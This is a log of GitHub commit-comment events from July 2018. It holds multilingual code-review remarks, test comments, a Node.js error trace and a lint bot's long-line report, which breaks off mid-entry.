{"id":"7999872721","type":"CommitCommentEvent","actor":{"login":"GarielWu"},"repo":{"name":"GarielWu/hello-world"},"payload":{"comment":{"id":29791650,"position":null,"line":null,"path":null,"commit_id":"09f5d928587782676daa096f7ab8dc2c7157a8ff","created_at":"2018-07-22T08:46:02Z","updated_at":"2018-07-22T08:46:02Z","author_association":"OWNER","body":"sahdsakj hf\r\nasdfsdasjf\r\naf\r\nadsf\r\nads\r\nf\r\nasd\r\nfdsa\r\nf\r\nasdfds"}},"created_at":"2018-07-22T08:46:02Z"}
{"id":"7999872950","type":"CommitCommentEvent","actor":{"login":"GarielWu"},"repo":{"name":"GarielWu/hello-world"},"payload":{"comment":{"id":29791651,"position":null,"line":null,"path":null,"commit_id":"09f5d928587782676daa096f7ab8dc2c7157a8ff","created_at":"2018-07-22T08:46:13Z","updated_at":"2018-07-22T08:46:13Z","author_association":"OWNER","body":"try1"}},"created_at":"2018-07-22T08:46:13Z"}
{"id":"7999873092","type":"CommitCommentEvent","actor":{"login":"PhenomRetroShare"},"repo":{"name":"PhenomRetroShare/RetroShare"},"payload":{"comment":{"id":29791652,"position":null,"line":null,"path":null,"commit_id":"1bce9f37d974378d59056354cdd58f660174b295","created_at":"2018-07-22T08:46:19Z","updated_at":"2018-07-22T08:46:19Z","author_association":"OWNER","body":"Done,\npegmarkdown is used with unfinished WikiPoos.\n\nOn Sat, Jul 21, 2018 at 1:47 AM, G10h4ck <notifications@github.com> wrote:\n\n> Great initiative!\n> RetroShare will be a happier platform once we have a good alternative to\n> sending HTML around and possibly get rid of it some day :)\n> Thanks!\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/PhenomRetroShare/RetroShare/commit/1bce9f37d974378d59056354cdd58f660174b295#commitcomment-29786044>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AI-IffCUjtqZI_qfH0eblrvuJI-hKI3iks5uImwIgaJpZM4VZZWt>\n> .\n>\n"}},"created_at":"2018-07-22T08:46:19Z"}
{"id":"7999873201","type":"CommitCommentEvent","actor":{"login":"rht0910"},"repo":{"name":"BlackListener/BlackListener"},"payload":{"comment":{"id":29791653,"position":null,"line":null,"path":null,"commit_id":"e68e980f486cb624436ea88b59677c199b08a1ce","created_at":"2018-07-22T08:46:25Z","updated_at":"2018-07-22T08:46:25Z","author_association":"MEMBER","body":"This is missed commit, and not synced with the public bot!"}},"created_at":"2018-07-22T08:46:25Z"}
{"id":"7999873287","type":"CommitCommentEvent","actor":{"login":"rht0910"},"repo":{"name":"rht0910/BlackListener"},"payload":{"comment":{"id":29791654,"position":null,"line":null,"path":null,"commit_id":"e68e980f486cb624436ea88b59677c199b08a1ce","created_at":"2018-07-22T08:46:29Z","updated_at":"2018-07-22T08:46:29Z","author_association":"OWNER","body":"```\r\n(node:21682) UnhandledPromiseRejectionWarning: Error: Cannot find module './data/users/254794124744458241/config.json'\r\n    at Function.Module._resolveFilename (module.js:547:15)\r\n    at Function.Module._load (module.js:474:25)\r\n    at Module.require (module.js:596:17)\r\n    at require (internal/module.js:11:18)\r\n    at Client.client.on (/root/dis/BlackListener/index.js:255:9)\r\n    at <anonymous>\r\n    at process._tickCallback (internal/process/next_tick.js:188:7)\r\n(node:21682) UnhandledPromiseRejectionWarning: Unhandled promise rejection. This error originated either by throwing inside of an async function without a catch block, or by rejecting a promise which was not handled with .catch(). (rejection id: 4)\r\n```"}},"created_at":"2018-07-22T08:46:29Z"}
{"id":"7999873486","type":"CommitCommentEvent","actor":{"login":"nLight"},"repo":{"name":"nLight/Memory-Game"},"payload":{"comment":{"id":29791655,"position":127,"line":127,"path":"src/components/App/App.jsx","commit_id":"7d6b314e8b7bd46bdf8a8dabdc0e5a35ac0f1301","created_at":"2018-07-22T08:46:41Z","updated_at":"2018-07-22T08:46:41Z","author_association":"OWNER","body":"Можно просто передавать `<BigCard card={this.cards[foundCardIndex]} ... />` а оно внутри само знает какие поля есть у карты"}},"created_at":"2018-07-22T08:46:41Z"}
{"id":"7999874715","type":"CommitCommentEvent","actor":{"login":"nLight"},"repo":{"name":"nLight/Memory-Game"},"payload":{"comment":{"id":29791659,"position":133,"line":133,"path":"src/components/App/App.jsx","commit_id":"7d6b314e8b7bd46bdf8a8dabdc0e5a35ac0f1301","created_at":"2018-07-22T08:47:46Z","updated_at":"2018-07-22T08:47:46Z","author_association":"OWNER","body":"Может было бы лучше вынести контроль `isShown` за пределы ответственности `BigCard`, по большому счету карточке все равно показывают ее или нет"}},"created_at":"2018-07-22T08:47:46Z"}
{"id":"7999875686","type":"CommitCommentEvent","actor":{"login":"FNickRU"},"repo":{"name":"FNickRU/course_test"},"payload":{"comment":{"id":29791660,"position":null,"line":null,"path":null,"commit_id":"5d31c747b37739fcba4d926c13b7c320d4f85a7d","created_at":"2018-07-22T08:48:38Z","updated_at":"2018-07-22T08:48:38Z","author_association":"OWNER","body":"К седьмой задаче поправки, конечно же"}},"created_at":"2018-07-22T08:48:38Z"}
{"id":"7999877601","type":"CommitCommentEvent","actor":{"login":"tolstikhell"},"repo":{"name":"GoogleChromeLabs/appr-wrapper"},"payload":{"comment":{"id":29791664,"position":null,"line":null,"path":null,"commit_id":"f4e68fc2034d777037fbd8237b4819efd5b0e6a1","created_at":"2018-07-22T08:50:18Z","updated_at":"2018-07-22T08:50:18Z","author_association":"NONE","body":"f4e68fc\r\n"}},"created_at":"2018-07-22T08:50:18Z"}
{"id":"7999877753","type":"CommitCommentEvent","actor":{"login":"ATianw"},"repo":{"name":"ATianw/Algorithms-4-Answers"},"payload":{"comment":{"id":29791665,"position":2,"line":2,"path":"README.md","commit_id":"6b8738204b7f6cc10f5515c0484970d1d879f653","created_at":"2018-07-22T08:50:25Z","updated_at":"2018-07-22T08:50:25Z","author_association":"OWNER","body":"这个项目的发起原因是：不知为何这本书的答案在网上甚少，官网上只有不到100道题的答案....众所周知，这本书的题量还是有点大的。所以一方面是希望能够做一份答案出来让大家在学习过程中能够有所参考，另一方面是希望自己的算法能够吃得透彻 ; )\r\n目前还在算法道路上摸索中，所以有不足的还是希望大家多多包涵以及指正~"}},"created_at":"2018-07-22T08:50:25Z"}
{"id":"7999878133","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18016/programming-term2"},"payload":{"comment":{"id":29791666,"position":null,"line":null,"path":null,"commit_id":"1f524f2af108f2918dfce43760f920658b1513c8","created_at":"2018-07-22T08:50:44Z","updated_at":"2018-07-22T08:50:44Z","author_association":"NONE","body":"現状メインメニューを列挙する状態になっていますね。\r\nまずは選択したメインメニューの値段を表示する所から進めてみましょう。\r\n余裕あれば続き進めてみてくださいね。"}},"created_at":"2018-07-22T08:50:44Z"}
{"id":"7999879444","type":"CommitCommentEvent","actor":{"login":"tolstikhell"},"repo":{"name":"GoogleChromeLabs/appr-wrapper"},"payload":{"comment":{"id":29791672,"position":null,"line":null,"path":null,"commit_id":"84984983cb39100e656978c969f2828882a20efe","created_at":"2018-07-22T08:51:56Z","updated_at":"2018-07-22T08:51:56Z","author_association":"NONE","body":"8498498"}},"created_at":"2018-07-22T08:51:56Z"}
{"id":"7999880704","type":"CommitCommentEvent","actor":{"login":"Blankymunn3"},"repo":{"name":"TeamKong/NFC_CHECK"},"payload":{"comment":{"id":29791674,"position":3,"line":2,"path":"app/src/main/res/layout/activity_main.xml","commit_id":"4676926403e73be5665000fba0c36c63e734ea52","created_at":"2018-07-22T08:53:03Z","updated_at":"2018-07-22T08:53:03Z","author_association":"CONTRIBUTOR","body":"불필요하게 띄어놓을필요없음"}},"created_at":"2018-07-22T08:53:03Z"}
{"id":"7999880829","type":"CommitCommentEvent","actor":{"login":"nLight"},"repo":{"name":"nLight/Memory-Game"},"payload":{"comment":{"id":29791675,"position":79,"line":79,"path":"src/components/App/App.jsx","commit_id":"7d6b314e8b7bd46bdf8a8dabdc0e5a35ac0f1301","created_at":"2018-07-22T08:53:09Z","updated_at":"2018-07-22T08:53:09Z","author_association":"OWNER","body":"При рестарте не обязательно копировать состояние. Можно просто все сбросить:\r\n```js\r\nthis.setState({\r\n  stage: 'start',\r\n  moves: 0,\r\n  openCards: [],\r\n  foundCards: [],\r\n  showFoundCard: false\r\n});\r\n```\r\nИ чтобы не повторяться можно даже это состояние вынести в константу\r\n```js\r\ncons newGame = {\r\n  stage: 'start',\r\n  moves: 0,\r\n  openCards: [],\r\n  foundCards: [],\r\n  showFoundCard: false\r\n};\r\n```"}},"created_at":"2018-07-22T08:53:09Z"}
{"id":"7999881719","type":"CommitCommentEvent","actor":{"login":"nLight"},"repo":{"name":"nLight/Memory-Game"},"payload":{"comment":{"id":29791677,"position":75,"line":75,"path":"src/components/App/App.jsx","commit_id":"7d6b314e8b7bd46bdf8a8dabdc0e5a35ac0f1301","created_at":"2018-07-22T08:53:57Z","updated_at":"2018-07-22T08:53:57Z","author_association":"OWNER","body":"Можно просто `this.setState({stage: \"running\"});` реакт сам знает как обновить состояние."}},"created_at":"2018-07-22T08:53:57Z"}
{"id":"7999882547","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29791679,"position":null,"line":null,"path":null,"commit_id":"ad6b3248a27c50efb70ddcf06f95201408fe12cf","created_at":"2018-07-22T08:54:46Z","updated_at":"2018-07-22T08:54:46Z","author_association":"NONE","body":"Good luck for LTC!"}},"created_at":"2018-07-22T08:54:46Z"}
{"id":"7999883532","type":"CommitCommentEvent","actor":{"login":"tkdoxsoxdg"},"repo":{"name":"tkdoxsoxdg/Tank_repository_result"},"payload":{"comment":{"id":29791681,"position":null,"line":null,"path":null,"commit_id":"96d6524c632f3876c33b7cd1afef7bbf816f1843","created_at":"2018-07-22T08:55:36Z","updated_at":"2018-07-22T08:55:36Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Unityチュートリアル③ タンク_BugFix](https://trello.com/c/Mr0WKxVR/62-unity%E3%83%81%E3%83%A5%E3%83%BC%E3%83%88%E3%83%AA%E3%82%A2%E3%83%AB%E2%91%A2-%E3%82%BF%E3%83%B3%E3%82%AFbugfix)"}},"created_at":"2018-07-22T08:55:36Z"}
{"id":"7999883540","type":"CommitCommentEvent","actor":{"login":"tkdoxsoxdg"},"repo":{"name":"tkdoxsoxdg/Tank_repository_result"},"payload":{"comment":{"id":29791682,"position":null,"line":null,"path":null,"commit_id":"96d6524c632f3876c33b7cd1afef7bbf816f1843","created_at":"2018-07-22T08:55:36Z","updated_at":"2018-07-22T08:55:36Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Unityチュートリアル③ タンク_BugFix](https://trello.com/c/Mr0WKxVR/62-unity%E3%83%81%E3%83%A5%E3%83%BC%E3%83%88%E3%83%AA%E3%82%A2%E3%83%AB%E2%91%A2-%E3%82%BF%E3%83%B3%E3%82%AFbugfix)"}},"created_at":"2018-07-22T08:55:36Z"}
{"id":"7999883726","type":"CommitCommentEvent","actor":{"login":"nLight"},"repo":{"name":"nLight/Memory-Game"},"payload":{"comment":{"id":29791684,"position":69,"line":69,"path":"src/components/App/App.jsx","commit_id":"7d6b314e8b7bd46bdf8a8dabdc0e5a35ac0f1301","created_at":"2018-07-22T08:55:47Z","updated_at":"2018-07-22T08:55:47Z","author_association":"OWNER","body":"Можно просто \r\n```js\r\nconst isFinished = this.cards.length === newState.foundCards.length;\r\nthis.setState({showFoundCard: false, stage: isFinished ? \"finished\" : undefined});\r\n```"}},"created_at":"2018-07-22T08:55:47Z"}
{"id":"7999884505","type":"CommitCommentEvent","actor":{"login":"nLight"},"repo":{"name":"nLight/Memory-Game"},"payload":{"comment":{"id":29791685,"position":8,"line":8,"path":"src/components/App/App.jsx","commit_id":"7d6b314e8b7bd46bdf8a8dabdc0e5a35ac0f1301","created_at":"2018-07-22T08:56:25Z","updated_at":"2018-07-22T08:56:25Z","author_association":"OWNER","body":"Лучше данные передавать как `prop` в `App`"}},"created_at":"2018-07-22T08:56:25Z"}
{"id":"7999885767","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18018/programming-term2"},"payload":{"comment":{"id":29791689,"position":null,"line":null,"path":null,"commit_id":"199141580e6990cb3324ba9f384343975c044919","created_at":"2018-07-22T08:57:32Z","updated_at":"2018-07-22T08:57:32Z","author_association":"NONE","body":"現状チェックしました。\r\nいくつか指摘を。\r\n\r\n・メインメニューの選択の部分\r\nキーが存在したかどうかはin句で判断できます。現状の\"== [main]ではその動きにならなさそうですね。\r\nまた、メインメニューのキャンセルが実装されていないようですが、これは余禄があればでいいと思います。\r\n\r\n・オプションメニューの選択の部分\r\n29行目：注文を終了したいのは「何も入力されなかったかqが押されたなので、\r\n　order_2 = \"\" or order_2 = \"q\" が正解になりますね。\r\n　それに当てはまらない場合に、メインメニュー同様にin句でリストに含まれるかどうかをチェックする必要があります。\r\n30行目：29行目のif条件に当てはまった場合その場でbreakされ、30行目には到達しないと思います。"}},"created_at":"2018-07-22T08:57:32Z"}
{"id":"7999885814","type":"CommitCommentEvent","actor":{"login":"gitmate-bot"},"repo":{"name":"coala/projects"},"payload":{"comment":{"id":29791690,"position":null,"line":null,"path":null,"commit_id":"c7e57dbae9611595629c3e903bee3ab2a9cf1f33","created_at":"2018-07-22T08:57:34Z","updated_at":"2018-07-22T08:57:34Z","author_association":"NONE","body":"Comment on c7e57dbae9611595629c3e903bee3ab2a9cf1f33.\n\nThere are 371 results for the section projects_ignore. They have been shortened and will not be shown inline because they are more than 10.\n\n| Message | File | Line |\n|---|---|---|\n| Line is longer than allowed. (116 > 80) | _projects/improve_installation.md | 4 |\n| Line is longer than allowed. (108 > 80) | _projects/improve_installation.md | 20 |\n| Line is longer than allowed. (105 > 80) | _projects/extend_linter_integration.md | 4 |\n| Line is longer than allowed. (103 > 80) | _projects/extend_linter_integration.md | 21 |\n| Line is longer than allowed. (118 > 80) | _projects/extend_linter_integration.md | 82 |\n| Line is longer than allowed. (108 > 80) | _projects/extend_linter_integration.md | 83 |\n| Line is longer than allowed. (95 > 80) | _projects/extend_linter_integration.md | 86 |\n| Line is longer than allowed. (95 > 80) | _projects/extend_linter_integration.md | 87 |\n| Line is longer than allowed. (105 > 80) | _projects/extend_linter_integration.md | 93 |\n| Line is longer than allowed. (115 > 80) | _projects/extend_linter_integration.md | 95 |\n| Line is longer than allowed. (110 > 80) | _projects/extend_linter_integration.md | 96 |\n| Line is longer than allowed. (115 > 80) | _projects/extend_linter_integration.md | 99 |\n| Line is longer than allowed. (110 > 80) | _projects/extend_linter_integration.md | 100 |\n| Line is longer than allowed. (118 > 80) | _projects/extend_linter_integration.md | 122 |\n| Line is longer than allowed. (109 > 80) | _projects/extend_linter_integration.md | 132 |\n| Line is longer than allowed. (85 > 80) | _projects/extend_linter_integration.md | 140 |\n| Line is longer than allowed. (84 > 80) | _projects/extend_linter_integration.md | 142 |\n| Line is longer than allowed. (118 > 80) | _projects/extend_linter_integration.md | 145 |\n| Line is longer than allowed. (94 > 80) | _projects/extend_linter_integration.md | 153 |\n| Line is longer than allowed. (90 > 80) | _projects/extend_linter_integration.md | 161 |\n| Line is longer than allowed. (84 > 80) | _projects/extend_linter_integration.md | 163 |\n| Line is longer than allowed. (82 > 80) | _projects/extend_linter_integration.md | 168 |\n| Line is longer than allowed. (81 > 80) | _projects/extend_linter_integration.md | 171 |\n| Line is longer than allowed. (87 > 80) | _projects/extend_linter_integration.md | 186 |\n| Line is longer than allowed. (104 > 80) | _projects/extend_linter_integration.md | 197 |\n| Line is longer than allowed. (82 > 80) | _projects/extend_linter_integration.md | 199 |\n| Line is longer than allowed. (81 > 80) | _projects/extend_linter_integration.md | 202 |\n| Line is longer than allowed. (87 > 80) | _projects/extend_linter_integration.md | 216 |\n| Line is longer than allowed. (89 > 80) | _projects/extend_linter_integration.md | 217 |\n| Line is longer than allowed. (90 > 80) | _projects/extend_linter_integration.md | 222 |\n| Line is longer than allowed. (87 > 80) | _projects/extend_linter_integration.md | 223 |\n| Line is longer than allowed. (86 > 80) | _projects/extend_linter_integration.md | 224 |\n| Line is longer than allowed. (84 > 80) | _projects/extend_linter_integration.md | 228 |\n| Line is longer than allowed. (87 > 80) | _projects/extend_linter_integration.md | 229 |\n| Line is longer than allowed. (89 > 80) | _projects/extend_linter_integration.md | 230 |\n| Line is longer than allowed. (100 > 80) | _projects/aspects.md | 4 |\n| Line is longer than allowed. (113 > 80) | _projects/go_bears_on_bsd.md | 4 |\n| Line is longer than allowed. (95 > 80) | _projects/go_bears_on_bsd.md | 19 |\n| Line is longer than allowed. (85 > 80) | _projects/cobot_enhancement.md | 4 |\n| Line is longer than allowed. (86 > 80) | _projects/optimize_caching.md | 24 |\n| Line is longer than allowed. (83 > 80) | _projects/optimize_caching.md | 60 |\n| Line is longer than allowed. (116 > 80) | _projects/add_repo_license.md | 48 |\n| Line is longer than allowed. (117 > 80) | _projects/add_repo_license.md | 49 |\n| Line is longer than allowed. (82 > 80) | _projects/add_repo_license.md | 52 |\n| Line is longer than allowed. (90 > 80) | _projects/add_repo_license.md | 53 |\n| Line is longer than allowed. (119 > 80) | _projects/add_repo_license.md | 65 |\n| Line is longer than allowed. (118 > 80) | _projects/add_repo_license.md | 68 |\n| Line is longer than allowed. (115 > 80) | _projects/add_repo_license.md | 118 |\n| Line is longer than allowed. (106 > 80) | _projects/add_repo_license.md | 138 |\n| Line is longer than allowed. (104 > 80) | _projects/add_repo_license.md | 144 |\n| Line is longer than allowed. (98 > 80) | _projects/add_repo_license.md | 146 |\n| Line is longer than allowed. (82 > 80) | _projects/add_repo_license.md | 150 |\n| Line is longer than allowed. (94 > 80) | _projects/add_repo_license.md | 151 |\n| Line is longer than allowed. (89 > 80) | _projects/nextgen_action_system.md | 3 |\n| Line is longer than allowed. (108 > 80) | _projects/nextgen_action_system.md | 17 |\n| Line is longer than allowed. (118 > 80) | _projects/nextgen_action_system.md | 18 |\n| Line is longer than allowed. (119 > 80) | _projects/nextgen_action_system.md | 19 |\n| Line is longer than allowed. (116 > 80) | _projects/nextgen_action_system.md | 22 |\n| Line is longer than allowed. (117 > 80) | _projects/nextgen_action_system.md | 24 |\n| Line is longer than allowed. (117 > 80) | _projects/nextgen_action_system.md | 25 |\n| Line is longer than allowed. (91 > 80) | _projects/nextgen_action_system.md | 36 |\n| Line is longer than allowed. (84 > 80) | _projects/nextgen_action_system.md | 40 |\n| Line is longer than allowed. (111 > 80) | _projects/nextgen_action_system.md | 41 |\n| Line is longer than allowed. (116 > 80) | _projects/nextgen_action_system.md | 47 |\n| Line is longer than allowed. (83 > 80) | _projects/automate_vulture_whitelist.md | 35 |\n| Line is longer than allowed. (86 > 80) | _projects/automate_vulture_whitelist.md | 81 |\n| Line is longer than allowed. (86 > 80) | _projects/automate_vulture_whitelist.md | 85 |\n| Line is longer than allowed. (98 > 80) | _projects/coala_web.md | 4 |\n| Line is longer than allowed. (95 > 80) | _projects/coala_web.md | 35 |\n| Line is longer than allowed. (81 > 80) | _projects/coala_web.md | 74 |\n| Line is longer than allowed. (82 > 80) | _projects/create_jenkins_plugin.md | 5 |\n| Line is longer than allowed. (113 > 80) | _projects/create_jenkins_plugin.md | 41 |\n| Line is longer than allowed. (96 > 80) | _projects/enhance_coala_quickstart.md | 4 |\n| Line is longer than allowed. (95 > 80) | _projects/enhance_coala_quickstart.md | 31 |\n| Line is longer than allowed. (89 > 80) | _projects/enhance_coala_quickstart.md | 32 |\n| Line is longer than allowed. (100 > 80) | _projects/enhance_coala_quickstart.md | 63 |\n| Line is longer than allowed. (118 > 80) | _projects/enhance_coala_quickstart.md | 70 |\n| Line is longer than allowed. (116 > 80) | _projects/enhance_coala_quickstart.md | 76 |\n| Line is longer than allowed. (85 > 80) | _projects/enhance_coala_quickstart.md | 79 |\n| Line is longer than allowed. (119 > 80) | _projects/enhance_coala_quickstart.md | 83 |\n| Line is longer than allowed. (83 > 80) | _projects/enhance_coala_quickstart.md | 92 |\n| Line is longer than allowed. (92 > 80) | _projects/coala_cli.md | 4 |\n| Line is longer than allowed. (87 > 80) | _projects/coala_cli.md | 62 |\n| Line is longer than allowed. (82 > 80) | _projects/coala_cli.md | 83 |\n| Line is longer than allowed. (103 > 80) | _projects/coala_cli.md | 85 |\n| Line is longer than allowed. (83 > 80) | _projects/coala_cli.md | 101 |\n| Line is longer than allowed. (86 > 80) | _projects/coala_cli.md | 110 |\n| Line is longer than allowed. (83 > 80) | _projects/coala_cli.md | 142 |\n| Line is longer than allowed. (96 > 80) | _projects/coala_cli.md | 152 |\n| Line is longer than allowed. (114 > 80) | _projects/integrate-pyflakes-AST.md | 48 |\n| Line is longer than allowed. (117 > 80) | _projects/integrate-pyflakes-AST.md | 50 |\n| Line is longer than allowed. (96 > 80) | _projects/integrate-pyflakes-AST.md | 53 |\n| Line is longer than allowed. (82 > 80) | _projects/integrate-pyflakes-AST.md | 85 |\n| Line is longer than allowed. (87 > 80) | _projects/bear_updates.md | 4 |\n| Line is longer than allowed. (91 > 80) | _projects/bear_updates.md | 18 |\n| Line is longer than allowed. (82 > 80) | _projects/bear_updates.md | 19 |\n| Line is longer than allowed. (96 > 80) | _projects/bear_updates.md | 20 |\n| Line is longer than allowed. (118 > 80) | _projects/bear_updates.md | 30 |\n| Line is longer than allowed. (100 > 80) | _projects/bear_updates.md | 32 |\n| Line is longer than allowed. (89 > 80) | _projects/bear_updates.md | 33 |\n| Line is longer than allowed. (114 > 80) | _projects/bear_updates.md | 34 |\n| Line is longer than allowed. (97 > 80) | _projects/bear_updates.md | 36 |\n| Line is longer than allowed. (116 > 80) | _projects/bear_updates.md | 37 |\n| Line is longer than allowed. (92 > 80) | _projects/bear_updates.md | 39 |\n| Line is longer than allowed. (105 > 80) | _projects/bear_updates.md | 40 |\n| Line is longer than allowed. (81 > 80) | _projects/bear_updates.md | 44 |\n| Line is longer than allowed. (114 > 80) | _projects/bear_updates.md | 45 |\n| Line is longer than allowed. (114 > 80) | _projects/bear_updates.md | 46 |\n| Line is longer than allowed. (111 > 80) | _projects/bear_updates.md | 47 |\n| Line is longer than allowed. (99 > 80) | _projects/bear_updates.md | 54 |\n| Line is longer than allowed. (84 > 80) | _projects/bear_updates.md | 55 |\n| Line is longer than allowed. (113 > 80) | _projects/bear_updates.md | 56 |\n| Line is longer than allowed. (114 > 80) | _projects/bear_updates.md | 62 |\n| Line is longer than allowed. (120 > 80) | _projects/bear_updates.md | 68 |\n| Line is longer than allowed. (104 > 80) | _projects/bear_updates.md | 70 |\n| Line is longer than allowed. (83 > 80) | _projects/bear_updates.md | 74 |\n| Line is longer than allowed. (98 > 80) | _projects/bear_updates.md | 75 |\n| Line is longer than allowed. (113 > 80) | _projects/bear_updates.md | 76 |\n| Line is longer than allowed. (115 > 80) | _projects/newcomer_metrics.md | 24 |\n| Line is longer than allowed. (87 > 80) | _projects/newcomer_metrics.md | 25 |\n| Line is longer than allowed. (116 > 80) | _projects/newcomer_metrics.md | 27 |\n| Line is longer than allowed. (116 > 80) | _projects/newcomer_metrics.md | 28 |\n| Line is longer than allowed. (119 > 80) | _projects/newcomer_metrics.md | 29 |\n| Line is longer than allowed. (113 > 80) | _projects/newcomer_metrics.md | 31 |\n| Line is longer than allowed. (112 > 80) | _projects/newcomer_metrics.md | 32 |\n| Line is longer than allowed. (118 > 80) | _projects/newcomer_metrics.md | 35 |\n| Line is longer than allowed. (115 > 80) | _projects/newcomer_metrics.md | 36 |\n| Line is longer than allowed. (108 > 80) | _projects/newcomer_metrics.md | 37 |\n| Line is longer than allowed. (109 > 80) | _projects/newcomer_metrics.md | 39 |\n| Line is longer than allowed. (117 > 80) | _projects/newcomer_metrics.md | 41 |\n| Line is longer than allowed. (94 > 80) | _projects/newcomer_metrics.md | 51 |\n| Line is longer than allowed. (94 > 80) | _projects/rstcheck_with_better_sphinx_support.md | 5 |\n| Line is longer than allowed. (118 > 80) | _projects/use_coala_2.md | 4 |\n| Line is longer than allowed. (84 > 80) | _projects/use_coala_2.md | 21 |\n| Line is longer than allowed. (83 > 80) | _projects/use_coala_2.md | 39 |\n| Line is longer than allowed. (97 > 80) | _projects/use_coala_2.md | 105 |\n| Line is longer than allowed. (96 > 80) | _projects/use_coala_2.md | 198 |\n| Line is longer than allowed. (81 > 80) | _projects/use_coala_2.md | 214 |\n| Line is longer than allowed. (92 > 80) | _projects/use_coala_2.md | 263 |\n| Line is longer than allowed. (98 > 80) | _projects/use_coala_2.md | 264 |\n| Line is longer than allowed. (92 > 80) | _projects/use_coala_2.md | 272 |\n| Line is longer than allowed. (117 > 80) | _projects/commit_based_perftest.md | 2 |\n| Line is longer than allowed. (103 > 80) | _projects/commit_based_perftest.md | 13 |\n| Line is longer than allowed. (118 > 80) | _projects/nested_languages.md | 4 |\n| Line is longer than allowed. (89 > 80) | _projects/nested_languages.md | 20 |\n| Line is longer than allowed. (107 > 80) | _projects/nested_languages.md | 42 |\n| Line is longer than allowed. (107 > 80) | _projects/nested_languages.md | 43 |\n| Line is longer than allowed. (115 > 80) | _projects/nested_languages.md | 44 |\n| Line is longer than allowed. (114 > 80) | _projects/nested_languages.md | 62 |\n| Line is longer than allowed. (117 > 80) | _projects/nested_languages.md | 67 |\n| Line is longer than allowed. (83 > 80) | _projects/nested_languages.md | 69 |\n| Line is longer than allowed. (95 > 80) | _projects/communication_bridge.md | 4 |\n| Line is longer than allowed. (104 > 80) | _projects/corobo_enhancement.md | 4 |\n| Line is longer than allowed. (89 > 80) | _projects/corobo_enhancement.md | 13 |\n| Line is longer than allowed. (117 > 80) | _projects/gitmate_testing.md | 4 |\n| Line is longer than allowed. (114 > 80) | _projects/gitmate_testing.md | 21 |\n| Line is longer than allowed. (113 > 80) | _projects/gitmate_testing.md | 82 |\n| Line is longer than allowed. (105 > 80) | _projects/gitmate_testing.md | 85 |\n| Line is longer than allowed. (89 > 80) | _projects/gitmate_jira.md | 6 |\n| Line is longer than allowed. (104 > 80) | _projects/gitmate_jira.md | 45 |\n| Line is longer than allowed. (83 > 80) | _projects/gitmate_jira.md | 52 |\n| Line is longer than allowed. (92 > 80) | _projects/gitmate_jira.md | 57 |\n| Line is longer than allowed. (108 > 80) | _projects/gitmate_jira.md | 59 |\n| Line is longer than allowed. (106 > 80) | _projects/gitmate_jira.md | 60 |\n| Line is longer than allowed. (118 > 80) | _projects/gitmate_jira.md | 62 |\n| Line is longer than allowed. (105 > 80) | _projects/gitmate_jira.md | 64 |\n| Line is longer than allowed. (105 > 80) | _projects/gitmate_jira.md | 75 |\n| Line is longer than allowed. (97 > 80) | _projects/git_task_list.md | 4 |\n| Line is longer than allowed. (91 > 80) | _projects/git_task_list.md | 17 |\n| Line is longer than allowed. (107 > 80) | _projects/git_task_list.md | 25 |\n| Line is longer than allowed. (103 > 80) | _projects/git_task_list.md | 37 |\n| Line is longer than allowed. (108 > 80) | _projects/git_task_list.md | 62 |\n| Line is longer than allowed. (103 > 80) | _projects/git_task_list.md | 88 |\n| Line is longer than allowed. (100 > 80) | _projects/git_task_list.md | 113 |\n| Line is longer than allowed. (108 > 80) | _projects/meta_review.md | 4 |\n| Line is longer than allowed. (91 > 80) | _projects/meta_review.md | 18 |\n| Line is longer than allowed. (108 > 80) | _projects/debug_profile.md | 4 |\n| Line is longer than allowed. (89 > 80) | _projects/debug_profile.md | 20 |\n| Line is longer than allowed. (114 > 80) | _projects/debug_profile.md | 40 |\n| Line is longer than allowed. (103 > 80) | _projects/debug_profile.md | 58 |\n| Line is longer than allowed. (87 > 80) | _projects/generic_bears.md | 4 |\n| Line is longer than allowed. (116 > 80) | _projects/generic_bears.md | 17 |\n| Line is longer than allowed. (99 > 80) | _projects/generic_bears.md | 19 |\n| Line is longer than allowed. (108 > 80) | _projects/generic_bears.md | 53 |\n| Line is longer than allowed. (117 > 80) | _projects/convert_bear_to_aspects.md | 19 |\n| Line is longer than allowed. (115 > 80) | _projects/convert_bear_to_aspects.md | 20 |\n| Line is longer than allowed. (118 > 80) | _projects/implement_aspects.md | 4 |\n| Line is longer than allowed. (117 > 80) | _projects/implement_aspects.md | 19 |\n| Line is longer than allowed. (115 > 80) | _projects/implement_aspects.md | 20 |\n| Line is longer than allowed. (82 > 80) | _projects/implement_aspects.md | 100 |\n| Line is longer than allowed. (82 > 80) | _projects/implement_aspects.md | 104 |\n| Line is longer than allowed. (103 > 80) | _projects/automate_dependency_repology.md | 5 |\n| Line is longer than allowed. (100 > 80) | _projects/automate_dependency_repology.md | 22 |\n| Line is longer than allowed. (119 > 80) | _projects/automate_dependency_repology.md | 31 |\n| Line is longer than allowed. (119 > 80) | _projects/automate_dependency_repology.md | 34 |\n| Line is longer than allowed. (117 > 80) | _projects/automate_dependency_repology.md | 37 |\n| Line is longer than allowed. (117 > 80) | _projects/automate_dependency_repology.md | 38 |\n| Line is longer than allowed. (105 > 80) | _projects/automate_dependency_repology.md | 39 |\n| Line is longer than allowed. (110 > 80) | _projects/automate_dependency_repology.md | 40 |\n| Line is longer than allowed. (113 > 80) | _projects/automate_dependency_repology.md | 42 |\n| Line is longer than allowed. (115 > 80) | _projects/automate_dependency_repology.md | 50 |\n| Line is longer than allowed. (108 > 80) | _projects/automate_dependency_repology.md | 56 |\n| Line is longer than allowed. (93 > 80) | _projects/automate_dependency_repology.md | 58 |\n| Line is longer than allowed. (118 > 80) | _projects/gitmate_gitlab.md | 6 |\n| Line is longer than allowed. (106 > 80) | _projects/gitmate_gitlab.md | 43 |\n| Line is longer than allowed. (111 > 80) | _projects/gitmate_gitlab.md | 91 |\n| Line is longer than allowed. (81 > 80) | _projects/gitmate_gitlab.md | 95 |\n| Line is longer than allowed. (81 > 80) | _projects/gitmate_gitlab.md | 106 |\n| Line is 